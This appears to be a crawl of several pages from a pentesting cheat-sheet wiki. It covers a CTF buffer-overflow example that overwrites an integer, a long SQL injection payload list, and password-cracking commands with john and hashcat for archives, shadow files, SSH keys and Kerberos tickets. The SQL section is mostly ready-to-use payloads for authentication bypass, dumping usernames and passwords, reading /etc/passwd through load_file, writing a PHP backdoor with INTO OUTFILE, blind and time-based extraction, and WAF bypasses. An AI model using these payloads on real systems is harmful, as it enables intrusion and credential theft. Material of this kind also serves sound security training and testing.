BoF - Int override** `# Code` `int main() {` `char buf[20];` `int x = 0;` `gets(buf);` `if (x == 1234) {` `// gid_t gid = getegid();` `// setresgid(gid, gid, gid);` `FILE *fp;` `fp = fopen("flag.txt", "r");` `char flag[64];` `fgets(flag, 64, (FILE*) fp);` `printf("Oh, un flag : %s", flag);` `}` `printf("x value : %d", x);` `return 0;` `}` `# Exploitation and Explanations` `# You want to override the “x” value` `# In the stack, 20 bytes are allowed to the buffer and 4 bytes are allowed to a pointer for this buffer.` `# After that comes the value of x, so you can overflow here` `$ python -c 'print "a"*24 + "\xd2\x04\x00\x00"' | ./pwn0` `$ python -c 'print "a"*24 + "\xd2\x04"' | ./pwn0` `$ python -c 'print "a"*22 + "\x00\x00\xd2\x04"' | ./pwn0` [arrow-up-right](https://cheatsheet.haax.fr/pwn/buffer-overflow/) [PreviousSSTIchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/ssti) [NextGENERAL INFORMATIONchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/general-information) Last updated 2 years ago --- # SQL injections | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) Resources https://websec.wordpress.com/tag/sql-filter-bypass/ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#cheat-sheet) Cheat sheet ---------------------------------------------------------------------------------------------------- https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md General and Tricks [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#classical-test) Classical test ---------------------------------------------------------------------------------------------------------- ' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - admin'-- - [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#upload-file) Upload file ---------------------------------------------------------------------------------------------------- union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#passwords) Passwords ------------------------------------------------------------------------------------------------ uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#dump-in-one-shot-shoot) Dump In One Shot (Shoot): ----------------------------------------------------------------------------------------------------------------------------- ' unIOn seLEct 1,make\_set(6,@:=0x0a,(selEct(1)froM(information\_schema.columns)whEre@:=make\_set(511,@,0x3c6c693e,table\_name,column\_name)),@)# [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#virgule-filtree) Virgule filtrée ------------------------------------------------------------------------------------------------------------ SELECT \* FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c //%0B pour espace possible [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#sha1-binary) sha1 binary ---------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#if-sha1-is-used-as-a-binary-string-true-you-can-use-an-hash-to-bypass-conditions-and-inject-sql) If sha1 is used as a binary string (true) you can use an hash to bypass conditions and inject SQL ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#http-pims.tuxfamily.org-blog-2011-04-write-up-sha1-is-fun-plaidctf) http://pims.tuxfamily.org/blog/2011/04/write-up-sha1-is-fun-plaidctf/ --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#echo-n-3fdf-or-openssl-sha1-binary) echo -n 3fDf | openssl sha1 -binary --------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#gbk-charset) GBK Charset ---------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#possible-to-bypass-addslashes-and-magic_quotes_gpc-using-chinese-charset) Possible to bypass addslashes and magic\_quotes\_gpc using chinese charset -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#x27) \\x27 == ' ------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#x5c) \\x5c == \\ -------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#all-chinese-char-starts-with-xbf) All chinese char starts with \\xbf ------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#xbf-x5c-is-a-chinese-char.-it-means-that-the-antislash-added-will-be-interpreted-as-a-part-or-chines) \\xbf\\x5c is a chinese char. It means that the antislash added will be interpreted as a part or chinese char and so the quote will be interpreted ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#where-user.login-xbf-or-1-1) where user.login="\\xbf' or 1=1; ----------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#numerical) Numerical ------------------------------------------------------------------------------------------------ &news\_id=1 union select... Classical String SQL Injection [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#trigg) Trigg ---------------------------------------------------------------------------------------- recherche=’or 1 ; [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#column-number) Column number -------------------------------------------------------------------------------------------------------- recherche=’ union select 666 ; → NOK recherche=’ union select 666,667 ; → OK [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#database-identification) Database identification ---------------------------------------------------------------------------------------------------------------------------- recherche=’ union select null,null from users ; recherche=’ union select @@version,null ; → NOK → No mysql / mssql recherche=’ union select versionnumber,null from sysibm.sysversions ; → NOK → Not a db2 recherche=’ union select version,null from v$instance ; → NOK → Not oracle recherche=’ union select version(),null ; → NOK → Not a postgres recherche=’ union select null,null from sqlite\_master ; → OK → SQLITE [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#tables-list) Tables list ---------------------------------------------------------------------------------------------------- recherche=’ union select name,null from sqlite\_master where type=’table’ ; [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#user-table-format) User table format ---------------------------------------------------------------------------------------------------------------- recherche=’union select null,sql FROM sqlite\_master WHERE tbl\_name = ’users’ AND type = ’table’ ; [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#data-extraction) Data extraction ------------------------------------------------------------------------------------------------------------ recherche=’ union select username,password from users ; recherche=’ union select username,year from users ; Routed SQL Injection [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#routed-double-sql-injection-the-first-result-is-injected-into-the-second-one) Routed → Double SQL Injection → The first result is injected into the second one ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ login=admin\\' group by 1# s' group by 2-- d → 0x73272067726f757020627920322d2d2064 login=s' union select 0x73272067726f757020627920322d2d2064-- d s' group by 2-- ds' union select email, password from users-- d → 0x732720756e696f6e2073656c65637420656d61696c2c2070617373776f72642066726f6d2075736572732d2d2064 SQL Truncation [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-can-bypass-some-sql-restrictions-playing-with-the-var-size-limits) You can bypass some SQL restrictions playing with the var size limits ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#create-table-users-username-varchar-10-password-varchar-20) create table users (username varchar(10), password varchar(20)) ; --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#insert-into-users-values-admin-findmeifyoucan) insert into users values(’admin’,’findMeIfYouCan’) ; ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#insert-into-users-values-admin-espace-20-mou-hackedman) insert into users values(’admin \[espace\] \*20 Mou’,’hackedMan’) ; ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- → 2 admins added → Possible to add your own admin account Error-based SQL Injection [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#all-is-based-on-the-output-you-can-then-identify-the-sgbd) All is based on the output, you can then identify the SGBD ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-want-to-generate-errors) You want to generate errors ------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-db) Get the db -------------------------------------------------------------------------------------------------- &order=,cast((chr(95)||current\_database()) as numeric) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-table-using-limit-offset-allows-iteration) Get the table (using LIMIT/OFFSET allows iteration) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- order=,cast(( SELECT table\_name FROM information\_schema.tables WHERE table\_catalog=current\_database() LIMIT 1 OFFSET 1 ) as numeric) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-columns) Get columns ---------------------------------------------------------------------------------------------------- order=,(cast(( SELECT column\_name FROM information\_schema.columns WHERE table\_name=chr(109)||chr(51)||chr(109)||chr(98)||chr(114)||chr(51)||chr(53)||chr(116)||chr(52)||chr(98)||chr(108)||chr(51) LIMIT 1 OFFSET 0 ) as int)) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#extract-rows-from-one-column) Extract rows from one column -------------------------------------------------------------------------------------------------------------------------------------- order=,(cast(( SELECT id||chr(32)||us3rn4m3\_c0l||chr(32)||p455w0rd\_c0l||chr(32)||em41l\_c0l FROM m3mbr35t4bl3 LIMIT 1 OFFSET 0) as int)) Insert SQL Injection [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#register-form) Register form -------------------------------------------------------------------------------------------------------- username=alex2&password=alex&email=@@version) ;# → OK but not executed username=alex3&password=alex&email=bla’),(’alex4’,’alex’,@@version) ;# → OK and executed ! username=alex5&password=alex&email=bla’),(’alex6’,’alex’,(SELECT table\_name FROM information\_schema.tables WHERE table\_schema=database() limit 0,1)) ;# username=alex7&password=alex&email=bla’),(’alex8’,’alex’,(SELECT column\_name FROM information\_schema.columns WHERE table\_name=’flag’ limit 0,1)) ;# Load File SQL Injection [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#to-read-a-file-you-need) To read a file you need ---------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#the-file-right-allow-you-to-use-load_file) the FILE right (allow you to use load\_file() ) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#the-file-full-path) The file full path ------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#to-get-the-full-path-for-index.php-for-example) To get the full path for index.php (for example) ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ?action=members&id\[\]=1 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-can-also-use-if-there-are-some-restrictions) You can also use if there are some restrictions ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- union all select 1,@@secure\_file\_priv,3,4 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#classic-use) Classic use ---------------------------------------------------------------------------------------------------- union all select load\_file('challenge/web-serveur/ch31/index.php'),2,3,4 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#if-quotes-are-filtered-you-can-use-hexa) If quotes are filtered, you can use hexa ------------------------------------------------------------------------------------------------------------------------------------------------------------- union all select load\_file(0x2f6368616c6c656e67652f7765622d736572766575722f636833312f696e6465782e706870),2,3,4 [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#or) Or ---------------------------------------------------------------------------------- id=(0)union(select(load\_file(char(47,101,116,99,47,112,97,115,115,119,100))),(0),(0),(0)from(member))' Time Based SQL [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-can-use-sql-properties-testing-from-left-to-right-if-first-statement-is-false-and-followed-by-an) You can use SQL properties → Testing from left to right → If first statement is false & followed by AND, the second won't be tested --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#payload-can-be-1-and-condition_a_tester-and-si_condition_true) Payload can be 1 AND \[condition\_a\_tester\] AND \[si\_condition\_true\] -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#heavy-query-1-greater-than-select-count-from-information_schema.columns-a-information_schema.columns) Heavy Query : 1>(SELECT count(\*) FROM information\_schema.columns A, information\_schema.columns B, information\_schema.columns C) --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#test-condition-exists-select-password-from-users-where-id-1-and-ascii-substring-password-index-1-cod) Test condition : exists(SELECT password FROM users WHERE id=1 AND ascii(substring(password,index,1))=codeascii) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#final-payload) Final payload -------------------------------------------------------------------------------------------------------- 1 AND exists(SELECT password FROM users WHERE id=1 AND ascii(substring(password,index,1))=codeascii) AND 1>(SELECT count(\*) FROM information\_schema.columns A, information\_schema.columns B, information\_schema.columns C) Blind SQL Injection [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-password-size) Get the password size ------------------------------------------------------------------------------------------------------------------------ username=admin'and (select length(password)>7)--+ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#or-1) or ------------------------------------------------------------------------------------ admin' and length(password)=8-- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#enumerate-password) Enumerate password ------------------------------------------------------------------------------------------------------------------ admin' and (select substr(password,1,1)='a')-- [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#or-2) or ------------------------------------------------------------------------------------ admin' and substr(password,1,1)='a'-- Bypass Filters [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#bypass-whitespace) Bypass whitespace ---------------------------------------------------------------------------------------------------------------- %0B [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#bypass-case-check-for-union) Bypass case check for UNION ------------------------------------------------------------------------------------------------------------------------------------ UniOn SeLeCT [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#bypass-comma-union-select-1-2-3-4) Bypass comma (UNION SELECT 1,2,3,4) -------------------------------------------------------------------------------------------------------------------------------------------------- UNION SELECT \* FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d UNION SELECT \* FROM (SELECT xxxx FROM xxxx LIMIT 1 OFFSET 0)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d SQLite - UNION based without filters [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#retrieve-the-table-name) Retrieve the table name ---------------------------------------------------------------------------------------------------------------------------- login=admin" UNION SELECT group\_concat(tbl\_name),2 FROM sqlite\_master WHERE type='table' AND tbl\_name NOT like 'sqlite\_%' limit 1 offset 1--&password=zzz [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-table-structure) Get the table structure ---------------------------------------------------------------------------------------------------------------------------- login=admin" UNION SELECT sql,2 FROM sqlite\_master WHERE type!='meta' AND sql NOT NULL AND name NOT like 'sqlite\_%' AND name='users'--&password=zzz [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#query-one-specific-rowinfi) Query one specific rowinfi ---------------------------------------------------------------------------------------------------------------------------------- login=admin" UNION SELECT login,2 FROM users LIMIT 1 OFFSET 2--&password=zzz WAF Bypass SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\\NFROM`test` SELECT@^1.FROM`test` SELECT-id-1.FROM`test` MySQL Injection without “in” [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#alternative-to-information_schema) Alternative to information\_schema ------------------------------------------------------------------------------------------------------------------------------------------------- SELECT \* FROM sys.x$schema\_flattened\_keys; [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-previous-records) Get previous records ---------------------------------------------------------------------------------------------------------------------- SELECT \* FROM sys.x$statement\_analysis [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#retrieving-information-without-the-column-name) Retrieving information without the column name -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- SELECT (SELECT 1, 'aa') = (SELECT \* FROM example) [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#forcing-case-insensitive-comparision) Forcing case insensitive comparision ------------------------------------------------------------------------------------------------------------------------------------------------------ [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#but-binary-will-be-flagged) But binary will be flagged ---------------------------------------------------------------------------------------------------------------------------------- SELECT (SELECT 1, BINARY('Aa')) = (SELECT \* FROM example) SELECT CONCAT("A", CAST(0 AS JSON)); [PreviousSERVER SIDE REQUEST FORGERY (SSRF)chevron-left](https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf) [NextSSTIchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/ssti) Last updated 2 years ago * [Cheat sheet](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#cheat-sheet) * [Classical test](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#classical-test) * [Upload file](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#upload-file) * [Passwords](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#passwords) * [Dump In One Shot (Shoot):](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#dump-in-one-shot-shoot) * [Virgule filtrée](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#virgule-filtree) * [sha1 binary](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#sha1-binary) * [If sha1 is used as a binary string (true) you can use an hash to bypass conditions and inject SQL](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#if-sha1-is-used-as-a-binary-string-true-you-can-use-an-hash-to-bypass-conditions-and-inject-sql) * [http://pims.tuxfamily.org/blog/2011/04/write-up-sha1-is-fun-plaidctf/](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#http-pims.tuxfamily.org-blog-2011-04-write-up-sha1-is-fun-plaidctf) * [echo -n 3fDf | openssl sha1 -binary](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#echo-n-3fdf-or-openssl-sha1-binary) * [GBK Charset](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#gbk-charset) * [Possible to bypass addslashes and magic\_quotes\_gpc using chinese charset](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#possible-to-bypass-addslashes-and-magic_quotes_gpc-using-chinese-charset) * [\\x27 == '](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#x27) * [\\x5c == \\](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#x5c) * [All chinese char starts with \\xbf](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#all-chinese-char-starts-with-xbf) * [\\xbf\\x5c is a chinese char. It means that the antislash added will be interpreted as a part or chinese char and so the quote will be interpreted](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#xbf-x5c-is-a-chinese-char.-it-means-that-the-antislash-added-will-be-interpreted-as-a-part-or-chines) * [where user.login="\\xbf' or 1=1;](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#where-user.login-xbf-or-1-1) * [Numerical](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#numerical) * [Trigg](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#trigg) * [Column number](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#column-number) * [Database identification](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#database-identification) * [Tables list](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#tables-list) * [User table format](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#user-table-format) * [Data extraction](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#data-extraction) * [Routed → Double SQL Injection → The first result is injected into the second one](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#routed-double-sql-injection-the-first-result-is-injected-into-the-second-one) * [You can bypass some SQL restrictions playing with the var size limits](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-can-bypass-some-sql-restrictions-playing-with-the-var-size-limits) * [create table users (username varchar(10), password varchar(20)) ;](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#create-table-users-username-varchar-10-password-varchar-20) * [insert into users values(’admin’,’findMeIfYouCan’) ;](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#insert-into-users-values-admin-findmeifyoucan) * [insert into users values(’admin \[espace\] \*20 Mou’,’hackedMan’) ;](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#insert-into-users-values-admin-espace-20-mou-hackedman) * [All is based on the output, you can then identify the SGBD](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#all-is-based-on-the-output-you-can-then-identify-the-sgbd) * [You want to generate errors](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-want-to-generate-errors) * [Get the db](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-db) * [Get the table (using LIMIT/OFFSET allows iteration)](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-table-using-limit-offset-allows-iteration) * [Get columns](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-columns) * [Extract rows from one column](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#extract-rows-from-one-column) * [Register form](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#register-form) * [To read a file you need](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#to-read-a-file-you-need) * [the FILE right (allow you to use load\_file() )](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#the-file-right-allow-you-to-use-load_file) * [The file full path](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#the-file-full-path) * [To get the full path for index.php (for example)](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#to-get-the-full-path-for-index.php-for-example) * [You can also use if there are some restrictions](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-can-also-use-if-there-are-some-restrictions) * [Classic use](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#classic-use) * [If quotes are filtered, you can use hexa](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#if-quotes-are-filtered-you-can-use-hexa) * [Or](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#or) * [You can use SQL properties → Testing from left to right → If first statement is false & followed by AND, the second won't be tested](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#you-can-use-sql-properties-testing-from-left-to-right-if-first-statement-is-false-and-followed-by-an) * [Payload can be 1 AND \[condition\_a\_tester\] AND \[si\_condition\_true\]](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#payload-can-be-1-and-condition_a_tester-and-si_condition_true) * [Heavy Query : 1>(SELECT count(\*) FROM information\_schema.columns A, information\_schema.columns B, information\_schema.columns C)](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#heavy-query-1-greater-than-select-count-from-information_schema.columns-a-information_schema.columns) * [Test condition : exists(SELECT password FROM users WHERE id=1 AND ascii(substring(password,index,1))=codeascii)](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#test-condition-exists-select-password-from-users-where-id-1-and-ascii-substring-password-index-1-cod) * [Final payload](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#final-payload) * [Get the password size](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-password-size) * [or](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#or-1) * [Enumerate password](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#enumerate-password) * [or](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#or-2) * [Bypass whitespace](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#bypass-whitespace) * [Bypass case check for UNION](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#bypass-case-check-for-union) * [Bypass comma (UNION SELECT 1,2,3,4)](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#bypass-comma-union-select-1-2-3-4) * [Retrieve the table name](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#retrieve-the-table-name) * [Get the table structure](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-the-table-structure) * [Query one specific rowinfi](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#query-one-specific-rowinfi) * [Alternative to information\_schema](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#alternative-to-information_schema) * [Get previous records](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#get-previous-records) * [Retrieving information without the column name](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#retrieving-information-without-the-column-name) * [Forcing case insensitive comparision](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#forcing-case-insensitive-comparision) * [But binary will be flagged](https://morgan-bin-bash.gitbook.io/pentesting/sql-injections#but-binary-will-be-flagged) --- # Cracking files | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FWCFtacSCMYrIeEDYyj6E%252FF-PQ6QhWwAAvJIx.jpeg%3Falt%3Dmedia%26token%3Df6d3b26e-b233-4977-9605-bb9f4074fa0e&width=1248&dpr=3&quality=100&sign=9cef98d0&sv=2) **Cracking archives** `# RAR` `rar2john file.rar > rar_hashes.txt` `john --wordlist=passwords.txt rar_hashes.txt` `# ZIP` `zip2john file.rar > zip_hashes.txt` `john --wordlist=passwords.txt zip_hashes.txt` `# ZIP Using fcrackzip` `fcrackzip -u -D -p rockyou.txt recup.zip` **Cracking shadow files** `unshadow passwd shadow > shadowjohn.txt` `john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --rules shadowjohn.txt` `john --show shadowjohn.txt` `# Hashcat SHA512 $6$ shadow file` `hashcat -m 1800 -a 0 hash.txt rockyou.txt --username` `#Hashcat MD5 $1$ shadow file` `hashcat -m 500 -a 0 hash.txt rockyou.txt --username` **Various cracking techniques** `# Hashcat MD5 Apache webdav file` `hashcat -m 1600 -a 0 hash.txt rockyou.txt` `# Hashcat SHA1` `hashcat -m 100 -a 0 hash.txt rockyou.txt --force` `# Hashcat Wordpress` `hashcat -m 400 -a 0 --remove hash.txt rockyou.txt` `# SSH Key` `ssh2john id_rsa > sshtocrack` `john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack` `# Cracking Cisco passwords` `# Type 5 → MD5` `# Type 7 → Easy reversible` `hashcat -m 500 c:emp\ciscohash.txt C:\DICS\english-dic.txt` `# Cracking NTLVMv2 hashes` `john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt` **Cracking TGS** `# Using John from bleeding repo:` `Go here /home/user/Desktop/Certifs/OSCP/Tools/PasswordCracking/JohnTheRipper/run` `./john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --fork=4 --format=krb5tgs /home/user/Desktop/HackTheBox/VM/Active/kerberos_hashes.txt` [PreviousJohn The Ripper Cheatsheetchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/john-the-ripper-cheatsheet) [NextWordlists & co.chevron-right](https://morgan-bin-bash.gitbook.io/pentesting/wordlists-and-co.) Last updated 2 years ago --- # Wordlists & co. | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FWCFtacSCMYrIeEDYyj6E%252FF-PQ6QhWwAAvJIx.jpeg%3Falt%3Dmedia%26token%3Df6d3b26e-b233-4977-9605-bb9f4074fa0e&width=1248&dpr=3&quality=100&sign=9cef98d0&sv=2) **Resources** [https://github.com/six2dez/OneListForAllarrow-up-right](https://github.com/six2dez/OneListForAll) [https://github.com/danielmiessler/SecListsarrow-up-right](https://github.com/danielmiessler/SecLists) `https://github.com/kaonashi-passwords/Kaonashi` `https://github.com/tarraschk/richelieu` `https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt` `https://packetstormsecurity.com/Crackers/wordlists/page4/` `http://www.gwicks.net/dictionaries.htm` `# SCADA Default Passwords` `http://www.critifence.com/default-password-database/` `https://weakpass.com/` 